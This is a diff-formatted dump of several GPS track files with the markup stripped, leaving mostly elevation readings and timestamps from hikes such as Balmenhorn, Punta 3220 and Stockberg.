+2015-08-21T09:28:31Z
+
+
+2611.56
+2015-08-21T09:29:41Z
+
+
+2604.35
+2015-08-21T09:31:10Z
+
+
+2609.16
+2015-08-21T09:33:05Z
+
+
+2611.56
+2015-08-21T09:33:32Z
+
+
+2613.48
+2015-08-21T09:33:47Z
+
+
+2614.92
+2015-08-21T09:33:53Z
+
+
+2618.29
+2015-08-21T09:36:28Z
+
+
+2620.69
+2015-08-21T09:40:05Z
+
+
+2630.3
+2015-08-21T09:41:40Z
+
+
+2609.16
+2015-08-21T09:45:20Z
+
+
+2602.43
+2015-08-21T09:47:35Z
+
+
+2606.75
+2015-08-21T09:49:54Z
+
+
+2610.12
+2015-08-21T09:52:21Z
+
+
+2609.64
+2015-08-21T09:52:58Z
+
+
+2630.79
+2015-08-21T09:57:11Z
+
+
+2648.09
+2015-08-21T09:59:58Z
+
+
+2648.09
+2015-08-21T10:03:18Z
+
+
+2636.07
+2015-08-21T10:06:57Z
+
+
+2629.34
+2015-08-21T10:08:53Z
+
+
+2616.85
+2015-08-21T10:11:09Z
+
+
+2613.0
+2015-08-21T10:13:36Z
+
+
+2615.88
+2015-08-21T10:15:19Z
+
+
+2615.4
+2015-08-21T10:16:50Z
+
+
+2619.73
+2015-08-21T10:22:05Z
+
+
+2614.44
+2015-08-21T10:24:11Z
+
+
+2602.43
+2015-08-21T10:26:05Z
+
+
+2577.91
+2015-08-21T10:28:16Z
+
+
+2554.36
+2015-08-21T10:29:57Z
+
+
+2539.94
+2015-08-21T10:30:54Z
+
+
+2530.81
+2015-08-21T10:31:39Z
+
+
+2520.23
+2015-08-21T10:32:30Z
+
+
+2514.95
+2015-08-21T10:32:55Z
+
+
+2511.1
+2015-08-21T10:33:20Z
+
+
+2506.29
+2015-08-21T10:33:57Z
+
+
+2502.45
+2015-08-21T10:34:14Z
+ "
+"
+
+
+
+
+
+
+Garmin International
+2018-04-15T13:00:34Z
+
+
+2018-04-15 13:29:45
+
+
+
+
+
+
+
+
+422.12
+2018-04-15T08:45:11Z
+
+
+421.77
+2018-04-15T08:45:34Z
+
+
+426.03
+2018-04-15T08:47:05Z
+
+
+436.44
+2018-04-15T08:47:55Z
+
+
+456.71
+2018-04-15T08:49:31Z
+
+
+481.8
+2018-04-15T08:51:12Z
+
+
+497.06
+2018-04-15T08:52:16Z
+
+
+506.36
+2018-04-15T08:52:51Z
+
+
+531.31
+2018-04-15T08:54:39Z
+
+
+547.17
+2018-04-15T08:55:51Z
+
+
+567.69
+2018-04-15T08:58:29Z
+
+
+571.42
+2018-04-15T08:59:17Z
+
+
+584.0
+2018-04-15T09:00:05Z
+
+
+589.86
+2018-04-15T09:03:23Z
+
+
+596.35
+2018-04-15T09:05:46Z
+
+
+626.42
+2018-04-15T09:08:04Z
+
+
+632.75
+2018-04-15T09:08:39Z
+
+
+642.37
+2018-04-15T09:09:25Z
+
+
+721.41
+2018-04-15T09:18:10Z
+
+
+746.17
+2018-04-15T09:20:06Z
+
+
+779.43
+2018-04-15T09:22:55Z
+
+
+811.24
+2018-04-15T09:25:48Z
+
+
+851.33
+2018-04-15T09:32:44Z
+
+
+910.71
+2018-04-15T09:38:12Z
+
+
+901.67
+2018-04-15T09:43:33Z
+
+
+932.96
+2018-04-15T09:50:22Z
+
+
+964.46
+2018-04-15T09:53:06Z
+
+
+1011.98
+2018-04-15T09:58:26Z
+
+
+1062.03
+2018-04-15T10:03:50Z
+
+
+1128.51
+2018-04-15T10:22:20Z
+
+
+1111.54
+2018-04-15T10:35:00Z
+
+
+1112.5
+2018-04-15T10:36:06Z
+
+
+1108.61
+2018-04-15T10:37:48Z
+
+
+1090.64
+2018-04-15T10:40:01Z
+
+
+1086.74
+2018-04-15T10:40:42Z
+
+
+1074.0
+2018-04-15T10:41:23Z
+
+
+1067.72
+2018-04-15T10:41:41Z
+
+
+1040.23
+2018-04-15T10:43:29Z
+
+
+1001.93
+2018-04-15T10:45:36Z
+
+
+976.72
+2018-04-15T10:47:01Z
+
+
+949.75
+2018-04-15T10:48:48Z
+
+
+931.04
+2018-04-15T10:50:43Z
+
+
+920.89
+2018-04-15T10:51:17Z
+
+
+913.38
+2018-04-15T10:52:28Z
+
+
+907.84
+2018-04-15T10:52:56Z
+
+
+901.22
+2018-04-15T10:53:33Z
+
+
+872.01
+2018-04-15T10:55:12Z
+
+
+854.92
+2018-04-15T10:56:32Z
+
+
+845.13
+2018-04-15T10:57:16Z
+
+
+834.71
+2018-04-15T10:57:52Z
+
+
+815.59
+2018-04-15T10:59:19Z
+
+
+718.49
+2018-04-15T11:05:52Z
+
+
+693.69
+2018-04-15T11:08:19Z
+
+
+645.58
+2018-04-15T11:12:45Z
+
+
+633.32
+2018-04-15T11:13:33Z
+
+
+615.14
+2018-04-15T11:14:41Z
+
+
+600.55
+2018-04-15T11:15:40Z
+
+
+594.5
+2018-04-15T11:16:54Z
+
+
+574.5
+2018-04-15T11:18:27Z
+
+
+561.13
+2018-04-15T11:19:51Z
+
+
+534.85
+2018-04-15T11:21:55Z
+
+
+513.59
+2018-04-15T11:24:34Z
+
+
+492.95
+2018-04-15T11:25:44Z
+
+
+485.05
+2018-04-15T11:26:23Z
+
+
+463.16
+2018-04-15T11:28:37Z
+
+
+484.35
+2018-04-15T11:29:43Z
+ "
+"
+
+
+
+
+
+
+2016-07-12T23:03:01Z
+
+
+2016-07-12 18:01:03
+
+
+
+2383.0
+2016-07-12T23:03:01Z
+
+
+
+
+0.000000
+
+2381.0
+2016-07-12T23:04:03Z
+
+
+
+
+1.650318
+
+2381.0
+2016-07-12T23:07:04Z
+
+
+
+
+4.336128
+
+2381.0
+2016-07-12T23:07:38Z
+
+
+
+
+2.652008
+
+2382.0
+2016-07-12T23:08:25Z
+
+
+
+
+0.882782
+
+2380.0
+2016-07-12T23:09:20Z
+
+
+
+
+0.536560
+
+2380.0
+2016-07-12T23:11:05Z
+
+
+
+
+2.781204
+
+2376.0
+2016-07-12T23:14:31Z
+
+
+
+
+5.567352
+
+2367.0
+2016-07-12T23:16:34Z
+
+
+
+
+8.933197
+
+2364.0
+2016-07-12T23:19:43Z
+
+
+
+
+1.766357
+
+2364.0
+2016-07-12T23:23:48Z
+
+
+
+
+0.975830
+
+2362.0
+2016-07-12T23:31:16Z
+
+
+
+
+3.226990
+
+2365.0
+2016-07-12T23:33:40Z
+
+
+
+
+1.949951
+
+2364.0
+2016-07-12T23:35:11Z
+
+
+
+
+3.005066
+
+2365.0
+2016-07-12T23:36:30Z
+
+
+
+
+1.662476
+
+2365.0
+2016-07-12T23:42:03Z
+
+
+
+
+3.614136
+
+2366.0
+2016-07-12T23:43:46Z
+
+
+
+
+2.161377
+
+2369.0
+2016-07-12T23:44:36Z
+
+
+
+
+5.735474
+
+2370.0
+2016-07-12T23:44:56Z
+
+
+
+
+9.855957
+
+2371.0
+2016-07-12T23:46:26Z
+
+
+
+
+2.232300
+
+2371.0
+2016-07-12T23:47:28Z
+
+
+
+
+7.634277
+
+2372.0
+2016-07-12T23:48:40Z
+
+
+
+
+8.169678
+
+2372.0
+2016-07-12T23:49:38Z
+
+
+
+
+6.386108
+
+2370.0
+2016-07-12T23:50:03Z
+
+
+
+
+9.667114
+
+2372.0
+2016-07-12T23:51:33Z
+
+
+
+
+3.214233
+
+2371.0
+2016-07-12T23:53:31Z
+
+
+
+
+0.601929
+
+2372.0
+2016-07-12T23:54:42Z
+
+
+
+
+10.075317
+
+2372.0
+2016-07-12T23:56:26Z
+
+
+
+
+4.926025
+
+2372.0
+2016-07-12T23:58:35Z
+
+
+
+
+0.323730
+
+2371.0
+2016-07-12T23:59:24Z
+
+
+
+
+0.782837
+
+2372.0
+2016-07-13T00:00:01Z
+
+
+
+
+10.003174
+
+2373.0
+2016-07-13T00:01:02Z
+
+
+
+
+0.550049 "
+"
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ "
+"
+
+
+Obri Hrad
+
+dodovogel
+
+dodovogel on GPSies.com
+GPSiesUserOnWeb
+
+
+Obri Hrad on GPSies.com
+trackOnWeb
+2017-01-03T14:12:22Z
+
+round trip
+214.0
+4201.899631769187
+871.0
+1014.0
+215.0
+
+Obri Hrad on GPSies.com
+
+trackOnWeb
+
+
+872.0
+2010-01-01T00:00:00Z
+
+
+871.0
+2010-01-01T00:00:05Z
+
+
+883.0
+2010-01-01T00:00:52Z
+
+
+904.0
+2010-01-01T00:01:23Z
+
+
+921.0
+2010-01-01T00:01:36Z
+
+
+941.0
+2010-01-01T00:02:18Z
+
+
+958.0
+2010-01-01T00:02:36Z
+
+
+972.0
+2010-01-01T00:02:56Z
+
+
+983.0
+2010-01-01T00:03:29Z
+
+
+987.0
+2010-01-01T00:03:42Z
+
+
+989.0
+2010-01-01T00:03:52Z
+
+
+997.0
+2010-01-01T00:04:18Z
+
+
+1008.0
+2010-01-01T00:04:47Z
+
+
+1009.0
+2010-01-01T00:05:21Z
+
+
+1014.0
+2010-01-01T00:06:11Z
+
+
+1010.0
+2010-01-01T00:06:33Z
+
+
+1006.0
+2010-01-01T00:06:44Z
+
+
+975.0
+2010-01-01T00:07:49Z
+
+
+972.0
+2010-01-01T00:08:18Z
+
+
+968.0
+2010-01-01T00:08:37Z
+
+
+961.0
+2010-01-01T00:08:52Z
+
+
+959.0
+2010-01-01T00:09:14Z
+
+
+961.0
+2010-01-01T00:09:30Z
+
+
+963.0
+2010-01-01T00:09:36Z
+
+
+981.0
+2010-01-01T00:10:14Z
+
+
+996.0
+2010-01-01T00:10:48Z
+
+
+992.0
+2010-01-01T00:11:09Z
+
+
+996.0
+2010-01-01T00:11:30Z
+
+
+988.0
+2010-01-01T00:11:48Z
+
+
+985.0
+2010-01-01T00:11:59Z
+
+
+983.0
+2010-01-01T00:12:23Z
+
+
+982.0
+2010-01-01T00:12:49Z
+
+
+981.0
+2010-01-01T00:13:16Z
+
+
+981.0
+2010-01-01T00:13:27Z
+
+
+976.0
+2010-01-01T00:13:38Z
+
+
+982.0
+2010-01-01T00:13:49Z
+
+
+984.0
+2010-01-01T00:14:11Z
+
+
+984.0
+2010-01-01T00:14:25Z
+
+
+980.0
+2010-01-01T00:14:38Z
+
+
+976.0
+2010-01-01T00:14:47Z
+
+
+981.0
+2010-01-01T00:14:59Z
+
+
+980.0
+2010-01-01T00:15:08Z
+
+
+975.0
+2010-01-01T00:15:31Z
+
+
+972.0
+2010-01-01T00:15:54Z
+
+
+969.0
+2010-01-01T00:16:21Z
+
+
+955.0
+2010-01-01T00:16:41Z
+
+
+931.0
+2010-01-01T00:17:05Z
+
+
+939.0
+2010-01-01T00:17:16Z
+
+
+942.0
+2010-01-01T00:17:24Z
+
+
+969.0
+2010-01-01T00:17:59Z
+
+
+975.0
+2010-01-01T00:18:48Z
+
+
+980.0
+2010-01-01T00:19:12Z
+
+
+983.0
+2010-01-01T00:19:47Z
+
+
+985.0
+2010-01-01T00:20:10Z
+
+
+988.0
+2010-01-01T00:20:21Z
+
+
+996.0
+2010-01-01T00:20:39Z
+
+
+992.0
+2010-01-01T00:21:00Z
+
+
+966.0
+2010-01-01T00:21:41Z
+
+
+941.0
+2010-01-01T00:22:59Z
+
+
+921.0
+2010-01-01T00:23:40Z
+
+
+903.0
+2010-01-01T00:23:54Z
+
+
+883.0
+2010-01-01T00:24:24Z
+
+
+871.0
+2010-01-01T00:25:12Z
+ "
+"
+
+
+
+
+
+
+Garmin International
+2016-12-22T17:28:27Z
+
+22-DEC-16 13:28:25
+
+
+
+
+
+15.52
+2016-12-22T14:37:58Z
+
+
+
+
+28.5
+2016-12-22T14:44:57Z
+
+
+
+
+43.4
+2016-12-22T14:46:35Z
+
+
+
+
+43.4
+2016-12-22T14:47:18Z
+
+
+
+
+59.74
+2016-12-22T14:56:49Z
+
+
+
+
+92.42
+2016-12-22T15:08:21Z
+
+
+
+
+115.5
+2016-12-22T15:17:12Z
+
+
+
+
+145.78
+2016-12-22T15:22:01Z
+
+
+
+
+169.33
+2016-12-22T15:25:28Z
+
+
+
+
+183.75
+2016-12-22T15:28:52Z
+
+
+
+
+192.4
+2016-12-22T15:31:09Z
+
+
+
+
+213.55
+2016-12-22T15:37:24Z
+
+
+
+
+222.68
+2016-12-22T15:39:23Z
+
+
+
+
+229.41
+2016-12-22T15:41:27Z
+
+
+
+
+244.79
+2016-12-22T15:46:01Z
+
+
+
+
+252.48
+2016-12-22T15:48:51Z
+
+
+
+
+251.04
+2016-12-22T15:52:43Z
+
+
+
+
+253.44
+2016-12-22T15:56:05Z
+
+
+
+
+256.33
+2016-12-22T16:01:14Z
+
+
+
+
+259.21
+2016-12-22T16:03:39Z
+
+
+
+
+255.37
+2016-12-22T16:05:37Z
+
+
+
+
+252.48
+2016-12-22T16:08:03Z
+
+
+
+
+244.79
+2016-12-22T16:09:47Z
+
+
+
+
+239.51
+2016-12-22T16:12:58Z
+
+
+
+
+236.62
+2016-12-22T16:16:36Z
+
+
+
+
+236.62
+2016-12-22T16:18:21Z
+
+
+
+
+233.26
+2016-12-22T16:22:50Z
+
+
+
+
+230.37
+2016-12-22T16:24:59Z
+
+
+
+
+229.89
+2016-12-22T16:25:31Z
+
+
+
+
+227.97
+2016-12-22T16:27:12Z
+
+
+
+
+228.45
+2016-12-22T16:30:05Z
+
+
+
+
+226.53
+2016-12-22T16:32:04Z
+
+
+
+
+213.55
+2016-12-22T16:36:18Z
+
+
+
+
+161.16
+2016-12-22T16:45:58Z
+
+
+
+
+148.66
+2016-12-22T16:47:36Z
+
+
+
+
+135.68
+2016-12-22T16:51:02Z
+
+
+
+
+123.67
+2016-12-22T16:53:24Z
+
+
+
+
+103.48
+2016-12-22T16:57:18Z
+
+
+
+
+95.79
+2016-12-22T16:59:12Z
+
+
+
+
+70.79
+2016-12-22T17:07:18Z
+
+
+
+
+65.03
+2016-12-22T17:09:46Z
+
+
+
+
+44.84
+2016-12-22T17:18:30Z
+
+
+
+
+36.67
+2016-12-22T17:20:34Z
+
+
+
+
+30.42
+2016-12-22T17:21:52Z
+
+
+
+
+27.53
+2016-12-22T17:24:34Z
+
+
+
+
+28.5
+2016-12-22T17:25:56Z
+
+
+
+
+28.5
+2016-12-22T17:28:19Z
+
+
+ "
+"
+
+
+Balmenhorn, 4164 m. - Copia.gpx
+
+
+
+
+Garmin International
+
+2016-08-23 16:20:16
+
+
+
+3619.53
+2016-08-23T09:24:18Z
+
+
+3630.2
+2016-08-23T09:26:41Z
+
+
+3623.69
+2016-08-23T09:37:38Z
+
+
+3632.79
+2016-08-23T09:39:31Z
+
+
+3646.42
+2016-08-23T09:41:46Z
+
+
+3658.72
+2016-08-23T09:44:52Z
+
+
+3668.75
+2016-08-23T09:47:29Z
+
+
+3687.83
+2016-08-23T09:52:04Z
+
+
+3736.27
+2016-08-23T10:01:36Z
+
+
+3825.26
+2016-08-23T10:27:15Z
+
+
+3902.8
+2016-08-23T10:45:21Z
+
+
+3996.95
+2016-08-23T11:11:14Z
+
+
+4018.47
+2016-08-23T11:25:38Z
+
+
+4053.54
+2016-08-23T11:39:49Z
+
+
+4077.02
+2016-08-23T11:47:48Z
+
+
+4089.26
+2016-08-23T11:50:21Z
+
+
+4137.42
+2016-08-23T12:10:36Z
+
+
+4164.41
+2016-08-23T12:18:01Z
+
+
+4175.47
+2016-08-23T12:23:14Z
+
+
+4185.47
+2016-08-23T12:28:29Z
+
+
+4171.02
+2016-08-23T12:41:47Z
+
+
+4142.44
+2016-08-23T12:46:42Z
+
+
+4065.57
+2016-08-23T12:54:37Z
+
+
+4034.5
+2016-08-23T12:57:27Z
+
+
+4016.94
+2016-08-23T13:09:22Z
+
+
+3903.13
+2016-08-23T13:20:47Z
+
+
+3839.7
+2016-08-23T13:25:33Z
+
+
+3749.2
+2016-08-23T13:34:30Z
+
+
+3713.96
+2016-08-23T13:36:53Z
+
+
+3685.37
+2016-08-23T13:40:23Z
+
+
+3672.74
+2016-08-23T13:42:43Z
+
+
+3658.42
+2016-08-23T13:45:05Z
+
+
+3647.33
+2016-08-23T13:46:08Z
+
+
+3637.2
+2016-08-23T13:47:24Z
+
+
+3639.79
+2016-08-23T13:57:01Z
+
+
+3625.81
+2016-08-23T14:20:08Z
+
+
+#fbaf00
+#1 "
+"
+
+
+
+
+
+
+Garmin International
+2015-07-31T15:43:43Z
+
+2015-07-31 17:43:41
+
+
+
+
+
+
+2466.09
+2015-07-31T12:39:30Z
+
+
+2466.31
+2015-07-31T12:42:15Z
+
+
+2456.33
+2015-07-31T12:43:43Z
+
+
+2400.94
+2015-07-31T12:47:41Z
+
+
+2373.47
+2015-07-31T12:55:51Z
+
+
+2371.21
+2015-07-31T12:57:29Z
+
+
+2345.79
+2015-07-31T13:03:12Z
+
+
+2328.48
+2015-07-31T13:06:54Z
+
+
+2281.27
+2015-07-31T13:13:14Z
+
+
+2246.23
+2015-07-31T13:22:57Z
+
+
+2229.18
+2015-07-31T13:24:29Z
+
+
+2218.36
+2015-07-31T13:27:36Z
+
+
+2196.53
+2015-07-31T13:30:42Z
+
+
+2180.54
+2015-07-31T13:34:44Z
+
+
+2115.97
+2015-07-31T13:40:53Z
+
+
+2090.09
+2015-07-31T13:45:05Z
+
+
+2060.51
+2015-07-31T13:49:53Z
+
+
+2058.79
+2015-07-31T13:57:32Z
+
+
+2058.05
+2015-07-31T14:01:35Z
+
+
+2054.64
+2015-07-31T14:03:17Z
+
+
+2047.21
+2015-07-31T14:05:07Z
+
+
+2074.23
+2015-07-31T14:14:01Z
+
+
+2072.02
+2015-07-31T14:15:21Z
+
+
+2016.97
+2015-07-31T14:20:30Z
+
+
+2010.36
+2015-07-31T14:22:00Z
+
+
+2013.56
+2015-07-31T14:23:49Z
+
+
+2052.34
+2015-07-31T14:31:03Z
+
+
+2070.78
+2015-07-31T14:33:05Z
+
+
+2082.65
+2015-07-31T14:39:51Z
+
+
+2091.43
+2015-07-31T14:42:21Z
+
+
+2101.16
+2015-07-31T14:43:29Z
+
+
+2137.43
+2015-07-31T14:59:34Z
+
+
+2138.74
+2015-07-31T15:00:04Z
+
+
+2144.95
+2015-07-31T15:00:44Z
+
+
+2169.87
+2015-07-31T15:05:40Z
+
+
+2211.11
+2015-07-31T15:11:06Z
+
+
+2237.19
+2015-07-31T15:16:31Z
+
+
+2248.4
+2015-07-31T15:17:48Z
+
+
+2283.68
+2015-07-31T15:22:05Z
+
+
+2329.1
+2015-07-31T15:27:15Z
+
+
+2330.79
+2015-07-31T15:27:54Z
+
+
+2338.8
+2015-07-31T15:28:44Z
+
+
+2378.92
+2015-07-31T15:33:29Z
+
+
+2393.87
+2015-07-31T15:36:00Z
+
+
+2413.21
+2015-07-31T15:38:24Z
+
+
+2429.59
+2015-07-31T15:40:18Z
+
+
+2457.58
+2015-07-31T15:43:30Z
+ "
+"
+
+
+
+
+
+
+Garmin International
+2014-05-25T15:32:17Z
+
+
+Stockberg 20140525
+
+
+
+
+
+
+1050.377685546875
+2014-05-25T08:21:44Z
+
+
+1064.79736328125
+2014-05-25T08:24:30Z
+
+
+1066.719970703125
+2014-05-25T08:25:03Z
+
+
+1071.526611328125
+2014-05-25T08:26:56Z
+
+
+1078.736572265625
+2014-05-25T08:29:10Z
+
+
+1082.581787109375
+2014-05-25T08:30:39Z
+
+
+1087.388427734375
+2014-05-25T08:31:40Z
+
+
+1087.869140625
+2014-05-25T08:33:01Z
+
+
+1097.00146484375
+2014-05-25T08:36:41Z
+
+
+1100.846923828125
+2014-05-25T08:38:07Z
+
+
+1112.382568359375
+2014-05-25T08:40:12Z
+
+
+1120.553955078125
+2014-05-25T08:41:51Z
+
+
+1120.0732421875
+2014-05-25T08:42:22Z
+
+
+1131.12841796875
+2014-05-25T08:44:04Z
+
+
+1141.22216796875
+2014-05-25T08:45:46Z
+
+
+1143.144775390625
+2014-05-25T08:46:11Z
+
+
+1147.951416015625
+2014-05-25T08:47:48Z
+
+
+1164.2939453125
+2014-05-25T08:50:53Z
+
+
+1178.23291015625
+2014-05-25T08:53:26Z
+
+
+1187.365478515625
+2014-05-25T08:54:57Z
+
+
+1187.365478515625
+2014-05-25T08:56:03Z
+
+
+1193.614013671875
+2014-05-25T08:58:37Z
+
+
+1217.16650390625
+2014-05-25T09:01:52Z
+
+
+1222.934326171875
+2014-05-25T09:02:45Z
+
+
+1243.121826171875
+2014-05-25T09:05:39Z
+
+
+1262.348388671875
+2014-05-25T09:09:30Z
+
+
+1297.917236328125
+2014-05-25T09:16:54Z
+
+
+1305.607666015625
+2014-05-25T09:19:11Z
+
+
+1318.58544921875
+2014-05-25T09:21:53Z
+
+
+1377.22607421875
+2014-05-25T09:36:47Z
+
+
+1386.8388671875
+2014-05-25T09:39:32Z
+
+
+1403.662109375
+2014-05-25T09:43:19Z
+
+
+1415.197998046875
+2014-05-25T09:47:03Z
+
+
+1418.081787109375
+2014-05-25T09:48:37Z
+
+
+1420.4853515625
+2014-05-25T09:48:55Z
+
+
+1418.5625
+2014-05-25T09:49:53Z
+
+
+1418.081787109375
+2014-05-25T09:59:28Z
+
+
+1420.004638671875
+2014-05-25T10:01:12Z
+
+
+1457.015380859375
+2014-05-25T10:04:52Z
+
+
+1468.070556640625
+2014-05-25T10:05:53Z
+
+
+1556.992431640625
+2014-05-25T10:15:07Z
+
+
+1641.107666015625
+2014-05-25T10:25:41Z
+
+
+1679.560546875
+2014-05-25T10:30:22Z
+
+
+1711.2841796875
+2014-05-25T10:34:14Z
+
+
+1744.93017578125
+2014-05-25T10:38:17Z
+
+
+1755.985107421875
+2014-05-25T10:39:29Z
+
+
+1757.427490234375
+2014-05-25T10:40:50Z
+ "
+"
+
+
+Punta 3220
+
+
+
+
+
+OruxMaps
+2016-08-12T12:45:02Z
+
+
+Punta 3220
+<h1>OruxMaps</h1><br /><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/><h2>Nome: Punta 3220</h2><br /><p>Orario inizio: 08/12/2016 14:45</p><p>Orario fine: 08/12/2016 16:45</p><p>Distanza: 3,9km (02:00)</p><p>Tempo movimento: 01:16</p><p>Velocità media: 1,9km/h</p><p>Velocità media mov.: 3,1km/h</p><p>Max. Velocità: 5,7km/h</p><p>Altitudine minima: 2795m</p><p>Altitudine massima: 3220m</p><p>Velocità di salita: 404,9m/h</p><p>Velocità di discesa: -453,3m/h</p><p>Dislivello positivo: 428m</p><p>Perdita di elevazione: -410m</p><p>Tempo di salita: 01:03</p><p>Tempo di discesa: 00:54</p><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/>
+
+Non definito
+
+
+
+
+
+2827.04
+2016-08-12T12:45:03Z
+
+
+2810.99
+2016-08-12T12:46:33Z
+
+
+2844.62
+2016-08-12T12:48:18Z
+
+
+2864.58
+2016-08-12T12:50:49Z
+
+
+2873.12
+2016-08-12T12:53:43Z
+
+
+2875.65
+2016-08-12T12:55:26Z
+
+
+2879.79
+2016-08-12T12:55:51Z
+
+
+2882.59
+2016-08-12T12:56:47Z
+
+
+2888.85
+2016-08-12T12:59:05Z
+
+
+2891.54
+2016-08-12T13:01:26Z
+
+
+2910.29
+2016-08-12T13:03:14Z
+
+
+2929.44
+2016-08-12T13:04:16Z
+
+
+2928.61
+2016-08-12T13:06:35Z
+
+
+2945.9
+2016-08-12T13:08:44Z
+
+
+2943.65
+2016-08-12T13:09:06Z
+
+
+2962.13
+2016-08-12T13:11:06Z
+
+
+2986.12
+2016-08-12T13:13:50Z
+
+
+3024.84
+2016-08-12T13:18:40Z
+
+
+3055.4
+2016-08-12T13:24:02Z
+
+
+3064.17
+2016-08-12T13:24:41Z
+
+
+3076.78
+2016-08-12T13:28:11Z
+
+
+3098.06
+2016-08-12T13:31:40Z
+
+
+3102.59
+2016-08-12T13:32:18Z
+
+
+3123.09
+2016-08-12T13:33:47Z
+
+
+3132.59
+2016-08-12T13:35:07Z
+
+
+3156.84
+2016-08-12T13:37:36Z
+
+
+3220.79
+2016-08-12T13:46:28Z
+
+
+3202.93
+2016-08-12T13:52:20Z
+
+
+3193.22
+2016-08-12T13:54:01Z
+
+
+3149.16
+2016-08-12T13:58:13Z
+
+
+3128.21
+2016-08-12T14:00:12Z
+
+
+3104.09
+2016-08-12T14:02:07Z
+
+
+3094.07
+2016-08-12T14:03:13Z
+
+
+3022.64
+2016-08-12T14:09:08Z
+
+
+3004.38
+2016-08-12T14:10:59Z
+
+
+2992.65
+2016-08-12T14:12:11Z
+
+
+2966.11
+2016-08-12T14:15:45Z
+
+
+2948.97
+2016-08-12T14:18:50Z
+
+
+2945.64
+2016-08-12T14:21:25Z
+
+
+2923.54
+2016-08-12T14:24:33Z
+
+
+2877.35
+2016-08-12T14:31:31Z
+
+
+2873.57
+2016-08-12T14:32:33Z
+
+
+2855.69
+2016-08-12T14:33:21Z
+
+
+2831.36
+2016-08-12T14:35:44Z
+
+
+2831.84
+2016-08-12T14:39:26Z
+
+
+2835.8
+2016-08-12T14:41:18Z
+
+
+2823.37
+2016-08-12T14:43:40Z
+
+
+2842.06
+2016-08-12T14:45:01Z
+
+
+2846.09
+2016-08-12T14:45:36Z
+ "
+"
+
+
+
+
+
+
+Garmin International
+2014-09-08T04:29:22Z
+
+
+Percorso
+
+
+
+1915.56
+2012-09-06T06:29:20Z
+
+
+1920.85
+2012-09-06T06:30:14Z
+
+
+1930.95
+2012-09-06T06:31:42Z
+
+
+1936.23
+2012-09-06T06:33:06Z
+
+
+1942.48
+2012-09-06T06:34:57Z
+
+
+1958.34
+2012-09-06T06:39:07Z
+
+
+1965.55
+2012-09-06T06:41:27Z
+
+
+1967.96
+2012-09-06T06:42:28Z
+
+
+1961.23
+2012-09-06T06:44:56Z
+
+
+2005.45
+2012-09-06T06:51:09Z
+
+
+2037.65
+2012-09-06T06:54:55Z
+
+
+2061.2
+2012-09-06T06:58:12Z
+
+
+2088.12
+2012-09-06T07:01:14Z
+
+
+2125.61
+2012-09-06T07:05:55Z
+
+
+2140.99
+2012-09-06T07:07:46Z
+
+
+2179.45
+2012-09-06T07:13:04Z
+
+
+2193.87
+2012-09-06T07:14:55Z
+
+
+2236.16
+2012-09-06T07:21:39Z
+
+
+2273.66
+2012-09-06T07:25:57Z
+
+
+2280.87
+2012-09-06T07:26:51Z
+
+
+2308.26
+2012-09-06T07:30:10Z
+
+
+2318.36
+2012-09-06T07:31:22Z
+
+
+2324.12
+2012-09-06T07:32:06Z
+
+
+2339.02
+2012-09-06T07:33:50Z
+
+
+2362.58
+2012-09-06T07:39:13Z
+
+
+2390.94
+2012-09-06T07:43:02Z
+
+
+2414.01
+2012-09-06T07:45:58Z
+
+
+2453.9
+2012-09-06T07:51:02Z
+
+
+2462.07
+2012-09-06T07:52:36Z
+
+
+2476.97
+2012-09-06T07:55:31Z
+
+
+2506.77
+2012-09-06T07:59:35Z
+
+
+2534.17
+2012-09-06T08:03:55Z
+
+
+2565.42
+2012-09-06T08:08:49Z
+
+
+2588.97
+2012-09-06T08:12:02Z
+
+
+2661.55
+2012-09-06T08:23:15Z
+
+
+2694.71
+2012-09-06T08:36:01Z
+
+
+2698.08
+2012-09-06T08:37:24Z
+
+
+2712.02
+2012-09-06T08:40:29Z
+
+
+2744.22
+2012-09-06T08:45:17Z
+
+
+2758.16
+2012-09-06T08:47:35Z
+
+
+2756.24
+2012-09-06T08:48:28Z
+
+
+2814.4
+2012-09-06T08:58:46Z
+
+
+2843.24
+2012-09-06T09:04:20Z
+
+
+2929.75
+2012-09-06T09:20:57Z
+
+
+2989.36
+2012-09-06T09:34:41Z
+
+
+3034.06
+2012-09-06T09:44:58Z
+
+
+3053.77
+2012-09-06T09:49:21Z
+
+
+3098.47
+2012-09-06T10:02:02Z
+
+
+3107.12
+2012-09-06T10:05:01Z
+
+
+3134.04
+2012-09-06T10:13:32Z
+
+
+3142.21
+2012-09-06T10:16:24Z
+
+
+3181.14
+2012-09-06T10:44:40Z
+
+
+3181.62
+2012-09-06T10:45:45Z
+ "
+"
+
+
+
+
+
+
+
+Venusberg
+26 déc. 2015 10:24 am
+
+
+
+466.208
+2015-12-26T09:24:52Z
+
+
+466.637
+2015-12-26T09:26:07Z
+
+
+473.261
+2015-12-26T09:27:35Z
+
+
+488.642
+2015-12-26T09:30:54Z
+
+
+491.718
+2015-12-26T09:32:46Z
+
+
+495.655
+2015-12-26T09:33:38Z
+
+
+502.385
+2015-12-26T09:35:43Z
+
+
+506.871
+2015-12-26T09:36:15Z
+
+
+509.34
+2015-12-26T09:36:47Z
+
+
+526.27
+2015-12-26T09:40:16Z
+
+
+526.162
+2015-12-26T09:44:16Z
+
+
+535.538
+2015-12-26T09:45:18Z
+
+
+535.428
+2015-12-26T09:45:54Z
+
+
+533.534
+2015-12-26T09:46:44Z
+
+
+531.972
+2015-12-26T09:48:10Z
+
+
+534.915
+2015-12-26T09:50:34Z
+
+
+536.897
+2015-12-26T09:52:59Z
+
+
+530.752
+2015-12-26T09:55:09Z
+
+
+525.648
+2015-12-26T09:56:05Z
+
+
+515.282
+2015-12-26T09:59:06Z
+
+
+509.058
+2015-12-26T10:02:04Z
+
+
+506.138
+2015-12-26T10:03:54Z
+
+
+507.276
+2015-12-26T10:04:59Z
+
+
+510.754
+2015-12-26T10:07:48Z
+
+
+508.042
+2015-12-26T10:10:48Z
+
+
+507.975
+2015-12-26T10:11:07Z
+
+
+511.384
+2015-12-26T10:12:24Z
+
+
+493.555
+2015-12-26T10:18:24Z
+
+
+491.599
+2015-12-26T10:19:18Z
+
+
+487.897
+2015-12-26T10:20:40Z
+
+
+480.557
+2015-12-26T10:22:10Z
+
+
+472.215
+2015-12-26T10:24:36Z
+
+
+461.718
+2015-12-26T10:29:33Z
